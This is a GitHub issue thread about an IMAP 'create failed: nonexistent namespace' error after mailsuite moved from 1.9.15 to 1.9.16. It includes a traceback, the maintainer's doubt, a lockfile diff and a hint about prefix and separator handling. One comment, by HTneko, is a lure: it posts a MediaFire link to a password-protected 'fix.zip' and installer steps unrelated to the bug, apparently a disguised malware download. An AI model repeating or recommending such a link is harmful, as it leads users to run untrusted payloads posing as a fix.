### ISSUE TITLE
IMAP4.error after updating from 1.9.15 to 1.9.16

### ISSUE THREAD

**Issue by jnoordsij** [seanthegeek/mailsuite#10]
Using this package in context of [parsedmarc](https://github.com/domainaware/parsedmarc), I noticed a regression in my setup after updating dependencies. Isolating the problem, I figured applying only the update of this package from 1.9.15 to 1.9.16 (using [Poetry](https://python-poetry.org/)) caused the following exception to be thrown on attempting to run `parsedmarc`:

```
    INFO:cli.py:1023:Starting parsedmarc
   ERROR:cli.py:1322:Mailbox Error
Traceback (most recent call last):
  File "/etc/poetry/.venv/lib/python3.12/site-packages/parsedmarc/cli.py", line 1301, in _main
    reports = get_dmarc_reports_from_mailbox(
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/etc/poetry/.venv/lib/python3.12/site-packages/parsedmarc/__init__.py", line 1425, in get_dmarc_reports_from_mailbox
    connection.create_folder(archive_folder)
  File "/etc/poetry/.venv/lib/python3.12/site-packages/parsedmarc/mail/imap.py", line 30, in create_folder
    self._client.create_folder(folder_name)
  File "/etc/poetry/.venv/lib/python3.12/site-packages/mailsuite/imap.py", line 305, in create_folder
    imapclient.IMAPClient.create_folder(self, folder_path)
  File "/etc/poetry/.venv/lib/python3.12/site-packages/imapclient/imapclient.py", line 1031, in create_folder
    return self._command_and_check(
           ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/etc/poetry/.venv/lib/python3.12/site-packages/imapclient/imapclient.py", line 1753, in _command_and_check
    self._checkok(command, typ, data)
  File "/etc/poetry/.venv/lib/python3.12/site-packages/imapclient/imapclient.py", line 1759, in _checkok
    self._check_resp("OK", command, typ, data)
  File "/etc/poetry/.venv/lib/python3.12/site-packages/imapclient/imapclient.py", line 1636, in _check_resp
    raise exceptions.IMAPClientError(
imaplib.IMAP4.error: create failed: Client tried to access nonexistent namespace. (Mailbox name should probably be prefixed with: INBOX.) (0.001 + 0.000 secs).
```

I'm looking for some assistance here; if any further debug details are required, let me know!

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seanthegeek** [comment]
Odd, the only change in 1.9.16 has nothing to do with IMAP. Are you sure you weren't on an erlier version? https://github.com/seanthegeek/mailsuite/commit/01cb8a8b899e1845518fc92de229ea6a2b82047d

**Comment by jnoordsij** [comment]
Yeah I'm sure of the version due to using a lockfile and building for Docker, thus having quite a lot of certainty about the used version. The following diff on my lockfile is enough to go from working fine to above error:
```diff
@@ -1095,13 +1095,13 @@ six = ">=1.14.0"

 [[package]]
 name = "mailsuite"
-version = "1.9.15"
+version = "1.9.16"
 description = "A Python package for retrieving, parsing, and sending emails"
 optional = false
 python-versions = ">=3.7"
 files = [
-    {file = "mailsuite-1.9.15-py3-none-any.whl", hash = "sha256:7b82d1a6e68b7c1c36898005da9efc36606ecb0ae1b451cb1f7ed4b39d810bad"},
-    {file = "mailsuite-1.9.15.tar.gz", hash = "sha256:4789c0a61c9d6a66688d047ba6ba396377598379d82b4f97e6514130952909fc"},
+    {file = "mailsuite-1.9.16-py3-none-any.whl", hash = "sha256:e1789e61b02138f4c95adffaffe02e5d9e7057cfabb2aad400b5c5d9dfc8ea3a"},
+    {file = "mailsuite-1.9.16.tar.gz", hash = "sha256:adf6af38e8afb6d5d799d03f365de35265c8510ae3c430d9f1c1dc3482502fa5"},
 ]

 [package.dependencies]
```

I do admit that I'm also quite surprised, as even the full changeset (https://github.com/seanthegeek/mailsuite/compare/a2f3b19fa5de9b743491eaaab39b781848563680...01cb8a8b899e1845518fc92de229ea6a2b82047d) does not seem to show anything to me that can be blamed for this...

**Comment by gaige** [comment]
@seanthegeek It looks like there were a some code style updates between .15 and .16 (made in 2023, but not published), and some seem related to handling of character sets around the prefix and separator.  Might be worth checking out.
